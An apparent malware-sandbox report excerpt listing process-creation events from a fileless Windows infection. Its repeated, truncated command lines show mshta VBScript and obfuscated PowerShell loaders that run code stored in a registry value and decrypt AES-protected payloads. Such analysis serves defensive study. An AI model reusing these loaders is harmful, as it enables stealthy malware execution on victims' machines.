Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mr
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c c:\windows\system32\windowspowershell\v1.0\powershell.exe -command "& {function it93g([byte[]]$e3oxu) {invoke-expression -debug -verbose 'h6m$h6mwh6mhh6mbh6m3h6m2h6m=h6m[h6msh6myh6msh6mth6meh6mmh6m.h6mth6meh6mxh6mth6m.h6meh6mnh6mch6moh6mdh6mih6mnh6mgh6m]h6m:h6m:h6muh6mth6mfh6m8h6m.h6mgh6meh6mth6msh6mth6mrh6mih6mnh6mgh6m(h6m$h6meh6m3h6moh6mxh6muh6m)h6m'.replace('h6m', ''); return $whb32; } function tiw6l([byte[]]$zuv5n) {invoke-expression -debug -warningaction inquire -verbose -informationaction ignore 'dtc$dtcqdtckdtcadtcgdtcidtc=dtc[dtcbdtcidtctdtccdtcodtcndtcvdtcedtcrdtctdtcedtcrdtc]dtc:dtc:dtctdtcodtcidtcndtctdtc3dtc2dtc(dtc$dtczdtcudtcvdtc5dtcndtc,dtc0dtc)dtc;dtc'.replace('dtc', ''); return $qkagi; } $h2oux = it93g(0x74<#agf8g#>,0x52<#sotvh#>,0x6b<#ijtfo#>,0x58<#aq0ez#>,0x43<#lryb0#>,0x36<#ldjca#>,0x6a<#drhtq#>,0x2b<#nxos5#>,0x34<#ajnvw#>,0x5a<#vkssp#>,0x6f<#nr7dj#>,0x52<#lsoi1#>,0x59<#pervd#>,0x62<#tlapz#>,0x79<#kbijz#>,0x47<#hncf5#>,0x70<#hu1xu#>,0x6f<#tuejh#>,0x4d<#cjg0h#>,0x45<#w2r2e#>,0x75<#qkdti#>,0x6b<#ljyd9#>,0x6b<#epinn#>,0x43<#yn4lf#>,0x59<#bh0r2#>,0x46<#bfrbe#>,0x42<#owjkm#>,0x51<#d0ipg#>,0x34<#pgajc#>,0x2f<#oktmn#>,0x46<#k7qw7#>,0x79<#ntwba#>,0x64<#lrwjs#>,0x34<#lp8kk#>,0x58<#gppfr#>,0x4f<#zhqok#>,0x4b<#xlpyw#>,0x4e<#qpxm0#>,0x58<#qdhox#>,0x78<#bubbt#>,0x2b<#gmsca#>,0x45<#csle7#>,0x67<#ldi0e#>,0x3d<#bmxwz#>); $qbags = it93g(0x4e<#c2vu0#>,0x47<#diarv#>,0x30<#mgpf7#>,0x52<#qdmxt#>,0x63<#aesom#>,0x50<#nfqkq#>,0x37<#uwobq#>,0x49<#mq8mb#>,0x36<#z2tts#>,0x7a<#gxc3u#>,0x75<#dzacy#>,0x45<#yjqhj#>,0x65<#drqb2#>,0x65<#tbnzn#>,0x6f<#cek6p#>,0x32<#hvj6e#>,0x46<#ycxzm#>,0x6f<#ywlmr#>,0x77<#ik0cx#>,0x72<#kls1z#>,0x34<#jknpr#>,0x51<#dzexq#>,0x3d<#kaung#>,0x3d<#f40yy#>); $zxcf8 = 
it93g(0x53<#b0lhd#>,0x6f<#ynhic#>,0x66<#bdsgx#>,0x74<#tossn#>,0x77<#hrywf#>,0x61<#i0n5w#>,0x72<#pudct#>,0x65<#r8glo#>,0x5c<#wrgut#>,0x4d<#lrnzo#>,0x69<#smhlu#>,0x63<#lcpm3#>,0x72<#galvu#>,0x6f<#oapw7#>,0x73<#uiger#>,0x6f<#svdmv#>,0x66<#tmxra#>,0x74<#enrsf#>,0x5c<#qtdsl#>,0x57<#aqua7#>,0x69<#lc02u#>,0x6e<#lgnex#>,0x64<#x9m0b#>,0x6f<#vc3vo#>,0x77<#htgri#>,0x73<#ioy3l#>); $hbkvc = it93g(0x73<#jbcod#>,0x31<#rvfxn#>,0x55<#zawun#>,0x6e<#qhnrl#>,0x62<#ywzwy#>); $b8dta = tiw6l(0x00<#a7hb6#>,0x00<#o0rd9#>,0x00<#jxcyj#>,0x00<#om184#>); $isxcm = tiw6l(0x45<#ood4n#>,0x00<#imgsk#>,0x00<#ylexb#>,0x00<#uuo0e#>); $l8xqf = tiw6l(0x03<#cqs75#>,0x00<#gs7w6#>,0x00<#gtblr#>,0x00<#o3nyw#>); $kzu3x = $null; function s2qwv($ti34n) {invoke-expression -verbose -debug -warningaction inquire 'bqr$bqrebqrlbqrpbqrtbqrfbqr=bqr[bqrsbqrybqrsbqrtbqrebqrmbqr.bqrsbqrebqrcbqrubqrrbqribqrtbqrybqr.bqrcbqrrbqrybqrpbqrtbqrobqrgbqrrbqrabqrpbqrhbqrybqr.bqrabqrebqrsbqr]bqr:bqr:bqrcbqrrbqrebqrabqrtbqrebqr(bqr)bqr;bqr'.replace('bqr', ''); invoke-expression -warningaction inquire -debug -informationaction ignore 'l3m$l3mel3mll3mpl3mtl3mfl3m.l3mml3mol3mdl3mel3m=l3m[l3msl3myl3msl3mtl3mel3mml3m.l3msl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mcl3mrl3myl3mpl3mtl3mol3mgl3
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe -command "& {function it93g([byte[]]$e3oxu) {invoke-expression -debug -verbose 'h6m$h6mwh6mhh6mbh6m3h6m2h6m=h6m[h6msh6myh6msh6mth6meh6mmh6m.h6mth6meh6mxh6mth6m.h6meh6mnh6mch6moh6mdh6mih6mnh6mgh6m]h6m:h6m:h6muh6mth6mfh6m8h6m.h6mgh6meh6mth6msh6mth6mrh6mih6mnh6mgh6m(h6m$h6meh6m3h6moh6mxh6muh6m)h6m'.replace('h6m', ''); return $whb32; } function tiw6l([byte[]]$zuv5n) {invoke-expression -debug -warningaction inquire -verbose -informationaction ignore 'dtc$dtcqdtckdtcadtcgdtcidtc=dtc[dtcbdtcidtctdtccdtcodtcndtcvdtcedtcrdtctdtcedtcrdtc]dtc:dtc:dtctdtcodtcidtcndtctdtc3dtc2dtc(dtc$dtczdtcudtcvdtc5dtcndtc,dtc0dtc)dtc;dtc'.replace('dtc', ''); return $qkagi; } $h2oux = it93g(0x74<#agf8g#>,0x52<#sotvh#>,0x6b<#ijtfo#>,0x58<#aq0ez#>,0x43<#lryb0#>,0x36<#ldjca#>,0x6a<#drhtq#>,0x2b<#nxos5#>,0x34<#ajnvw#>,0x5a<#vkssp#>,0x6f<#nr7dj#>,0x52<#lsoi1#>,0x59<#pervd#>,0x62<#tlapz#>,0x79<#kbijz#>,0x47<#hncf5#>,0x70<#hu1xu#>,0x6f<#tuejh#>,0x4d<#cjg0h#>,0x45<#w2r2e#>,0x75<#qkdti#>,0x6b<#ljyd9#>,0x6b<#epinn#>,0x43<#yn4lf#>,0x59<#bh0r2#>,0x46<#bfrbe#>,0x42<#owjkm#>,0x51<#d0ipg#>,0x34<#pgajc#>,0x2f<#oktmn#>,0x46<#k7qw7#>,0x79<#ntwba#>,0x64<#lrwjs#>,0x34<#lp8kk#>,0x58<#gppfr#>,0x4f<#zhqok#>,0x4b<#xlpyw#>,0x4e<#qpxm0#>,0x58<#qdhox#>,0x78<#bubbt#>,0x2b<#gmsca#>,0x45<#csle7#>,0x67<#ldi0e#>,0x3d<#bmxwz#>); $qbags = it93g(0x4e<#c2vu0#>,0x47<#diarv#>,0x30<#mgpf7#>,0x52<#qdmxt#>,0x63<#aesom#>,0x50<#nfqkq#>,0x37<#uwobq#>,0x49<#mq8mb#>,0x36<#z2tts#>,0x7a<#gxc3u#>,0x75<#dzacy#>,0x45<#yjqhj#>,0x65<#drqb2#>,0x65<#tbnzn#>,0x6f<#cek6p#>,0x32<#hvj6e#>,0x46<#ycxzm#>,0x6f<#ywlmr#>,0x77<#ik0cx#>,0x72<#kls1z#>,0x34<#jknpr#>,0x51<#dzexq#>,0x3d<#kaung#>,0x3d<#f40yy#>); $zxcf8 = 
it93g(0x53<#b0lhd#>,0x6f<#ynhic#>,0x66<#bdsgx#>,0x74<#tossn#>,0x77<#hrywf#>,0x61<#i0n5w#>,0x72<#pudct#>,0x65<#r8glo#>,0x5c<#wrgut#>,0x4d<#lrnzo#>,0x69<#smhlu#>,0x63<#lcpm3#>,0x72<#galvu#>,0x6f<#oapw7#>,0x73<#uiger#>,0x6f<#svdmv#>,0x66<#tmxra#>,0x74<#enrsf#>,0x5c<#qtdsl#>,0x57<#aqua7#>,0x69<#lc02u#>,0x6e<#lgnex#>,0x64<#x9m0b#>,0x6f<#vc3vo#>,0x77<#htgri#>,0x73<#ioy3l#>); $hbkvc = it93g(0x73<#jbcod#>,0x31<#rvfxn#>,0x55<#zawun#>,0x6e<#qhnrl#>,0x62<#ywzwy#>); $b8dta = tiw6l(0x00<#a7hb6#>,0x00<#o0rd9#>,0x00<#jxcyj#>,0x00<#om184#>); $isxcm = tiw6l(0x45<#ood4n#>,0x00<#imgsk#>,0x00<#ylexb#>,0x00<#uuo0e#>); $l8xqf = tiw6l(0x03<#cqs75#>,0x00<#gs7w6#>,0x00<#gtblr#>,0x00<#o3nyw#>); $kzu3x = $null; function s2qwv($ti34n) {invoke-expression -verbose -debug -warningaction inquire 'bqr$bqrebqrlbqrpbqrtbqrfbqr=bqr[bqrsbqrybqrsbqrtbqrebqrmbqr.bqrsbqrebqrcbqrubqrrbqribqrtbqrybqr.bqrcbqrrbqrybqrpbqrtbqrobqrgbqrrbqrabqrpbqrhbqrybqr.bqrabqrebqrsbqr]bqr:bqr:bqrcbqrrbqrebqrabqrtbqrebqr(bqr)bqr;bqr'.replace('bqr', ''); invoke-expression -warningaction inquire -debug -informationaction ignore 'l3m$l3mel3mll3mpl3mtl3mfl3m.l3mml3mol3mdl3mel3m=l3m[l3msl3myl3msl3mtl3mel3mml3m.l3msl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mcl3mrl3myl3mpl3mtl3mol3mgl3mr
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "& {function ib6pi([byte[]]$sf4dz) {invoke-expression -verbose -warningaction inquire -debug 'o2o$o2oco2oqo2o1o2oao2ogo2o=o2o[o2oso2oyo2oso2oto2oeo2omo2o.o2oto2oeo2oxo2oto2o.o2oeo2ono2oco2ooo2odo2oio2ono2ogo2o]o2o:o2o:o2ouo2oto2ofo2o8o2o.o2ogo2oeo2oto2oso2oto2oro2oio2ono2ogo2o(o2o$o2oso2ofo2o4o2odo2ozo2o)o2o'.replace('o2o', ''); return $cq1ag; } function smsgn([byte[]]$tys1w) {invoke-expression -verbose -informationaction ignore 'sti$stirstiwstizstiwstihsti=sti[stibstiistitsticstiostinstivstiestirstitstiestirsti]sti:sti:stitstiostiistinstitsti3sti2sti(sti$stitstiystissti1stiwsti,sti0sti)sti;sti'.replace('sti', ''); return $rwzwh; } $you0b = ib6pi(0x74<#chvvk#>,0x52<#u2cey#>,0x6b<#mvtfn#>,0x58<#yicr7#>,0x43<#k8mg9#>,0x36<#uhqq4#>,0x6a<#cqm2o#>,0x2b<#flcxm#>,0x34<#oy2rt#>,0x5a<#alzz6#>,0x6f<#zokd3#>,0x52<#d4ovl#>,0x59<#slwj0#>,0x62<#zsa1m#>,0x79<#sfoep#>,0x47<#qgvn9#>,0x70<#ks1u4#>,0x6f<#ugj9p#>,0x4d<#kwql0#>,0x45<#emsau#>,0x75<#ov8nf#>,0x6b<#uzpyf#>,0x6b<#xibw9#>,0x43<#hubo7#>,0x59<#ujal4#>,0x46<#zynnj#>,0x42<#jy42r#>,0x51<#wtnpa#>,0x34<#yav4n#>,0x2f<#hv4mn#>,0x46<#nkdcb#>,0x79<#luwsl#>,0x64<#awco3#>,0x34<#cnifi#>,0x58<#uqmod#>,0x4f<#yng7w#>,0x4b<#hebay#>,0x4e<#a4cb9#>,0x58<#f6vnf#>,0x78<#kxgak#>,0x2b<#zmzdt#>,0x45<#e8p88#>,0x67<#zyzgc#>,0x3d<#auma2#>); $pkds6 = ib6pi(0x4e<#hlrgc#>,0x47<#xvisw#>,0x30<#ehfxr#>,0x52<#wp7gt#>,0x63<#cpdce#>,0x50<#ohyle#>,0x37<#xvqhb#>,0x49<#petlw#>,0x36<#lzgm3#>,0x7a<#ttbog#>,0x75<#rxgr0#>,0x45<#ysplk#>,0x65<#qhxnz#>,0x65<#qaxw9#>,0x6f<#w6vt9#>,0x32<#giqig#>,0x46<#ygjpj#>,0x6f<#hp9ri#>,0x77<#dphbh#>,0x72<#kctwk#>,0x34<#x6ppe#>,0x51<#vbwrn#>,0x3d<#rcqfm#>,0x3d<#l7seq#>); $mxwap = 
ib6pi(0x53<#dbfnz#>,0x6f<#jy4lx#>,0x66<#ez47j#>,0x74<#b1uku#>,0x77<#kcrdo#>,0x61<#gimoz#>,0x72<#muppg#>,0x65<#a0bz2#>,0x5c<#ehl3n#>,0x4d<#zitvl#>,0x69<#smht8#>,0x63<#fjc9s#>,0x72<#hmqwi#>,0x6f<#nkobo#>,0x73<#izfrk#>,0x6f<#j1yat#>,0x66<#dzrc7#>,0x74<#fm5r5#>,0x5c<#rybgp#>,0x57<#t0puw#>,0x69<#vtrqa#>,0x6e<#bhzjx#>,0x64<#mvlqt#>,0x6f<#p5ny6#>,0x77<#dohgt#>,0x73<#sx8cw#>); $rgohu = ib6pi(0x6b<#qlddy#>,0x70<#nhkb5#>,0x44<#zww3k#>,0x53<#envxb#>,0x46<#xm0xt#>); $rwlto = smsgn(0x00<#h5sfv#>,0x00<#ucupc#>,0x00<#mid9v#>,0x00<#hxoxf#>); $ewov8 = $true; $jok5y = $null; function yz1gd($vhgbc) {invoke-expression -warningaction inquire -debug -verbose -informationaction ignore 'cka$ckaeckayckayckaqckahcka=cka[ckasckayckasckatckaeckamcka.ckasckaeckacckauckarckaickatckaycka.ckacckarckayckapckatckaockagckarckaackapckahckaycka.ckaackaeckascka]cka:cka:ckacckarckaeckaackatckaecka(cka)cka'.replace('cka', ''); invoke-expression -warningaction inquire -verbose 'rhv$rhverhvyrhvyrhvqrhvhrhv.rhvmrhvorhvdrhverhv=rhv[rhvsrhvyrhvsrhvtrhverhvmrhv.rhvsrhverhvcrhvurhvrrhvirhvtrhvyrhv.rhvcrhvrrhvyrhvprhvtrhvorhvgrhvrrhvarhvprhvhrhvyrhv.rhvcrhvirhvprhvhrhverhvrrhvmrhvorhvdrhverhv]rhv:rhv:rhvcrhvbrhvcrhv'.replace('rhv', ''); invoke-expression -verbose -d
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "& {function irujv([byte[]]$f9mpx) {invoke-expression -verbose -debug -informationaction ignore 'zzo$zzoszzofzzoyzzoszzo9zzo=zzo[zzoszzoyzzoszzotzzoezzomzzo.zzotzzoezzoxzzotzzo.zzoezzonzzoczzoozzodzzoizzonzzogzzo]zzo:zzo:zzouzzotzzofzzo8zzo.zzogzzoezzotzzoszzotzzorzzoizzonzzogzzo(zzo$zzofzzo9zzomzzopzzoxzzo)zzo'.replace('zzo', ''); return $sfys9; } function ssyta([byte[]]$mydkv) {invoke-expression -warningaction inquire -verbose 'rzw$rzwgrzwwrzw1rzwmrzwhrzw=rzw[rzwbrzwirzwtrzwcrzworzwnrzwvrzwerzwrrzwtrzwerzwrrzw]rzw:rzw:rzwtrzworzwirzwnrzwtrzw3rzw2rzw(rzw$rzwmrzwyrzwdrzwkrzwvrzw,rzw0rzw)rzw;rzw'.replace('rzw', ''); return $gw1mh; } $mxypq = irujv(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxmg = irujv(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gyqop = irujv(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $qr3m4 = irujv(0x4a, 0x6d, 106, 53, 121); $q21ag = irujv(0x67, 0x69, 69, 99, 67); $u2okr = ssyta(0x00, 0, 0, 0x00); $dxs3r = $true; $gns0e = $null; function juypb($gsles) {invoke-expression -debug -warningaction inquire 'fs5$fs5wfs5gfs52fs5gfs5lfs5=fs5[fs5sfs5yfs5sfs5tfs5efs5mfs5.fs5sfs5efs5cfs5ufs5rfs5ifs5tfs5yfs5.fs5cfs5rfs5yfs5pfs5tfs5ofs5gfs5rfs5afs5pfs5hfs5yfs5.fs5afs5efs5sfs5]fs5:fs5:fs5cfs5rfs5efs5afs5tfs5efs5(fs5)fs5'.replace('fs5', ''); invoke-expression -informationaction ignore -warningaction inquire -debug -verbose 
'hta$htawhtaghta2htaghtalhta.htamhtaohtadhtaehta=hta[htashtayhtashtathtaehtamhta.htashtaehtachtauhtarhtaihtathtayhta.htachtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htachtaihtaphtahhtaehtarhtamhtaohtadhtaehta]hta:hta:htachtabhtachta'.replace('hta', ''); invoke-expression -debug -informationaction ignore -warningaction inquire 'rly$rlywrlygrly2rlygrlylrly.rlyprlyarlydrlydrlyirlynrlygrly=rly[rlysrlyyrlysrlytrlyerlymrly.rlysrlyerlycrlyurlyrrlyirlytrlyyrly.rlycrlyrrlyyrlyprlytrlyorlygrlyrrlyarlyprlyhrlyyrly.rlyprlyarlydrlydrlyirlynrlygrlymrlyorlydrlyerly]rly:rly:rlyprlykrlycrlysrly7rly'.replace('rly', ''); invoke-expression -warningaction inquire -verbose 'mng$mngwmnggmng2mnggmnglmng.mngkmngemngymng=mng[mngsmngymngsmngtmngemngmmng.mngcmngomngnmngvmngemngrmngtmng]mng:mng:mngfmngrmngomngmmngbmngamngsmngemng6mng4mngsmngtmngrmngimngnmnggmng(mng$mngmmngxmngymngpmngqmng)mng'.replace('mng', ''); invoke-expression -informationaction ignore -warningaction inquire 'bnk$bnkwbnkgbnk2bnkgbnklbnk.bnkibnkvbnk=bnk[bnksbnkybnksbnktbnkebnkmbnk.bnkcbnkobnknbnkvbnkebnkrbnktbnk]bnk:bnk:bnkfbnkrbnkobnkmbnkbbnkabnksbnkebnk6bnk4bnksbnktbnkrbnkibnknbnkgbnk(bnk$bnkl
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" vbscript:execute("d2h=strreverse(""llehs.tpircsw""):set xar=createobject(d2h):xar.run ""powershell.exe -command $r = [microsoft.win32.registry]::currentuser.opensubkey('software\microsoft\windows'); iex $r.getvalue('elnlg')"", 0:close")
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" vbscript:execute("d2h=strreverse(""llehs.tpircsw""):set xar=createobject(d2h):xar.run ""powershell.exe -command $r = [microsoft.win32.registry]::currentuser.opensubkey('software\microsoft\windows'); iex $r.getvalue('elnlg')"", 0:close")
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c c:\windows\system32\windowspowershell\v1.0\powershell.exe -command "& {function it93g([byte[]]$e3oxu) {invoke-expression -debug -verbose 'h6m$h6mwh6mhh6mbh6m3h6m2h6m=h6m[h6msh6myh6msh6mth6meh6mmh6m.h6mth6meh6mxh6mth6m.h6meh6mnh6mch6moh6mdh6mih6mnh6mgh6m]h6m:h6m:h6muh6mth6mfh6m8h6m.h6mgh6meh6mth6msh6mth6mrh6mih6mnh6mgh6m(h6m$h6meh6m3h6moh6mxh6muh6m)h6m'.replace('h6m', ''); return $whb32; } function tiw6l([byte[]]$zuv5n) {invoke-expression -debug -warningaction inquire -verbose -informationaction ignore 'dtc$dtcqdtckdtcadtcgdtcidtc=dtc[dtcbdtcidtctdtccdtcodtcndtcvdtcedtcrdtctdtcedtcrdtc]dtc:dtc:dtctdtcodtcidtcndtctdtc3dtc2dtc(dtc$dtczdtcudtcvdtc5dtcndtc,dtc0dtc)dtc;dtc'.replace('dtc', ''); return $qkagi; } $h2oux = it93g(0x74<#agf8g#>,0x52<#sotvh#>,0x6b<#ijtfo#>,0x58<#aq0ez#>,0x43<#lryb0#>,0x36<#ldjca#>,0x6a<#drhtq#>,0x2b<#nxos5#>,0x34<#ajnvw#>,0x5a<#vkssp#>,0x6f<#nr7dj#>,0x52<#lsoi1#>,0x59<#pervd#>,0x62<#tlapz#>,0x79<#kbijz#>,0x47<#hncf5#>,0x70<#hu1xu#>,0x6f<#tuejh#>,0x4d<#cjg0h#>,0x45<#w2r2e#>,0x75<#qkdti#>,0x6b<#ljyd9#>,0x6b<#epinn#>,0x43<#yn4lf#>,0x59<#bh0r2#>,0x46<#bfrbe#>,0x42<#owjkm#>,0x51<#d0ipg#>,0x34<#pgajc#>,0x2f<#oktmn#>,0x46<#k7qw7#>,0x79<#ntwba#>,0x64<#lrwjs#>,0x34<#lp8kk#>,0x58<#gppfr#>,0x4f<#zhqok#>,0x4b<#xlpyw#>,0x4e<#qpxm0#>,0x58<#qdhox#>,0x78<#bubbt#>,0x2b<#gmsca#>,0x45<#csle7#>,0x67<#ldi0e#>,0x3d<#bmxwz#>); $qbags = it93g(0x4e<#c2vu0#>,0x47<#diarv#>,0x30<#mgpf7#>,0x52<#qdmxt#>,0x63<#aesom#>,0x50<#nfqkq#>,0x37<#uwobq#>,0x49<#mq8mb#>,0x36<#z2tts#>,0x7a<#gxc3u#>,0x75<#dzacy#>,0x45<#yjqhj#>,0x65<#drqb2#>,0x65<#tbnzn#>,0x6f<#cek6p#>,0x32<#hvj6e#>,0x46<#ycxzm#>,0x6f<#ywlmr#>,0x77<#ik0cx#>,0x72<#kls1z#>,0x34<#jknpr#>,0x51<#dzexq#>,0x3d<#kaung#>,0x3d<#f40yy#>); $zxcf8 = 
it93g(0x53<#b0lhd#>,0x6f<#ynhic#>,0x66<#bdsgx#>,0x74<#tossn#>,0x77<#hrywf#>,0x61<#i0n5w#>,0x72<#pudct#>,0x65<#r8glo#>,0x5c<#wrgut#>,0x4d<#lrnzo#>,0x69<#smhlu#>,0x63<#lcpm3#>,0x72<#galvu#>,0x6f<#oapw7#>,0x73<#uiger#>,0x6f<#svdmv#>,0x66<#tmxra#>,0x74<#enrsf#>,0x5c<#qtdsl#>,0x57<#aqua7#>,0x69<#lc02u#>,0x6e<#lgnex#>,0x64<#x9m0b#>,0x6f<#vc3vo#>,0x77<#htgri#>,0x73<#ioy3l#>); $hbkvc = it93g(0x73<#jbcod#>,0x31<#rvfxn#>,0x55<#zawun#>,0x6e<#qhnrl#>,0x62<#ywzwy#>); $b8dta = tiw6l(0x00<#a7hb6#>,0x00<#o0rd9#>,0x00<#jxcyj#>,0x00<#om184#>); $isxcm = tiw6l(0x45<#ood4n#>,0x00<#imgsk#>,0x00<#ylexb#>,0x00<#uuo0e#>); $l8xqf = tiw6l(0x03<#cqs75#>,0x00<#gs7w6#>,0x00<#gtblr#>,0x00<#o3nyw#>); $kzu3x = $null; function s2qwv($ti34n) {invoke-expression -verbose -debug -warningaction inquire 'bqr$bqrebqrlbqrpbqrtbqrfbqr=bqr[bqrsbqrybqrsbqrtbqrebqrmbqr.bqrsbqrebqrcbqrubqrrbqribqrtbqrybqr.bqrcbqrrbqrybqrpbqrtbqrobqrgbqrrbqrabqrpbqrhbqrybqr.bqrabqrebqrsbqr]bqr:bqr:bqrcbqrrbqrebqrabqrtbqrebqr(bqr)bqr;bqr'.replace('bqr', ''); invoke-expression -warningaction inquire -debug -informationaction ignore 'l3m$l3mel3mll3mpl3mtl3mfl3m.l3mml3mol3mdl3mel3m=l3m[l3msl3myl3msl3mtl3mel3mml3m.l3msl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mcl3mrl3myl3mpl3mtl3mol3mgl3Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "& {function ib6pi([byte[]]$sf4dz) {invoke-expression -verbose -warningaction inquire -debug 'o2o$o2oco2oqo2o1o2oao2ogo2o=o2o[o2oso2oyo2oso2oto2oeo2omo2o.o2oto2oeo2oxo2oto2o.o2oeo2ono2oco2ooo2odo2oio2ono2ogo2o]o2o:o2o:o2ouo2oto2ofo2o8o2o.o2ogo2oeo2oto2oso2oto2oro2oio2ono2ogo2o(o2o$o2oso2ofo2o4o2odo2ozo2o)o2o'.replace('o2o', ''); return $cq1ag; } function smsgn([byte[]]$tys1w) {invoke-expression -verbose -informationaction ignore 'sti$stirstiwstizstiwstihsti=sti[stibstiistitsticstiostinstivstiestirstitstiestirsti]sti:sti:stitstiostiistinstitsti3sti2sti(sti$stitstiystissti1stiwsti,sti0sti)sti;sti'.replace('sti', ''); return $rwzwh; } $you0b = ib6pi(0x74<#chvvk#>,0x52<#u2cey#>,0x6b<#mvtfn#>,0x58<#yicr7#>,0x43<#k8mg9#>,0x36<#uhqq4#>,0x6a<#cqm2o#>,0x2b<#flcxm#>,0x34<#oy2rt#>,0x5a<#alzz6#>,0x6f<#zokd3#>,0x52<#d4ovl#>,0x59<#slwj0#>,0x62<#zsa1m#>,0x79<#sfoep#>,0x47<#qgvn9#>,0x70<#ks1u4#>,0x6f<#ugj9p#>,0x4d<#kwql0#>,0x45<#emsau#>,0x75<#ov8nf#>,0x6b<#uzpyf#>,0x6b<#xibw9#>,0x43<#hubo7#>,0x59<#ujal4#>,0x46<#zynnj#>,0x42<#jy42r#>,0x51<#wtnpa#>,0x34<#yav4n#>,0x2f<#hv4mn#>,0x46<#nkdcb#>,0x79<#luwsl#>,0x64<#awco3#>,0x34<#cnifi#>,0x58<#uqmod#>,0x4f<#yng7w#>,0x4b<#hebay#>,0x4e<#a4cb9#>,0x58<#f6vnf#>,0x78<#kxgak#>,0x2b<#zmzdt#>,0x45<#e8p88#>,0x67<#zyzgc#>,0x3d<#auma2#>); $pkds6 = ib6pi(0x4e<#hlrgc#>,0x47<#xvisw#>,0x30<#ehfxr#>,0x52<#wp7gt#>,0x63<#cpdce#>,0x50<#ohyle#>,0x37<#xvqhb#>,0x49<#petlw#>,0x36<#lzgm3#>,0x7a<#ttbog#>,0x75<#rxgr0#>,0x45<#ysplk#>,0x65<#qhxnz#>,0x65<#qaxw9#>,0x6f<#w6vt9#>,0x32<#giqig#>,0x46<#ygjpj#>,0x6f<#hp9ri#>,0x77<#dphbh#>,0x72<#kctwk#>,0x34<#x6ppe#>,0x51<#vbwrn#>,0x3d<#rcqfm#>,0x3d<#l7seq#>); $mxwap = 
ib6pi(0x53<#dbfnz#>,0x6f<#jy4lx#>,0x66<#ez47j#>,0x74<#b1uku#>,0x77<#kcrdo#>,0x61<#gimoz#>,0x72<#muppg#>,0x65<#a0bz2#>,0x5c<#ehl3n#>,0x4d<#zitvl#>,0x69<#smht8#>,0x63<#fjc9s#>,0x72<#hmqwi#>,0x6f<#nkobo#>,0x73<#izfrk#>,0x6f<#j1yat#>,0x66<#dzrc7#>,0x74<#fm5r5#>,0x5c<#rybgp#>,0x57<#t0puw#>,0x69<#vtrqa#>,0x6e<#bhzjx#>,0x64<#mvlqt#>,0x6f<#p5ny6#>,0x77<#dohgt#>,0x73<#sx8cw#>); $rgohu = ib6pi(0x6b<#qlddy#>,0x70<#nhkb5#>,0x44<#zww3k#>,0x53<#envxb#>,0x46<#xm0xt#>); $rwlto = smsgn(0x00<#h5sfv#>,0x00<#ucupc#>,0x00<#mid9v#>,0x00<#hxoxf#>); $ewov8 = $true; $jok5y = $null; function yz1gd($vhgbc) {invoke-expression -warningaction inquire -debug -verbose -informationaction ignore 'cka$ckaeckayckayckaqckahcka=cka[ckasckayckasckatckaeckamcka.ckasckaeckacckauckarckaickatckaycka.ckacckarckayckapckatckaockagckarckaackapckahckaycka.ckaackaeckascka]cka:cka:ckacckarckaeckaackatckaecka(cka)cka'.replace('cka', ''); invoke-expression -warningaction inquire -verbose 'rhv$rhverhvyrhvyrhvqrhvhrhv.rhvmrhvorhvdrhverhv=rhv[rhvsrhvyrhvsrhvtrhverhvmrhv.rhvsrhverhvcrhvurhvrrhvirhvtrhvyrhv.rhvcrhvrrhvyrhvprhvtrhvorhvgrhvrrhvarhvprhvhrhvyrhv.rhvcrhvirhvprhvhrhverhvrrhvmrhvorhvdrhverhv]rhv:rhv:rhvcrhvbrhvcrhv'.replace('rhv', ''); invoke-expression -verbose -dJump to behavior
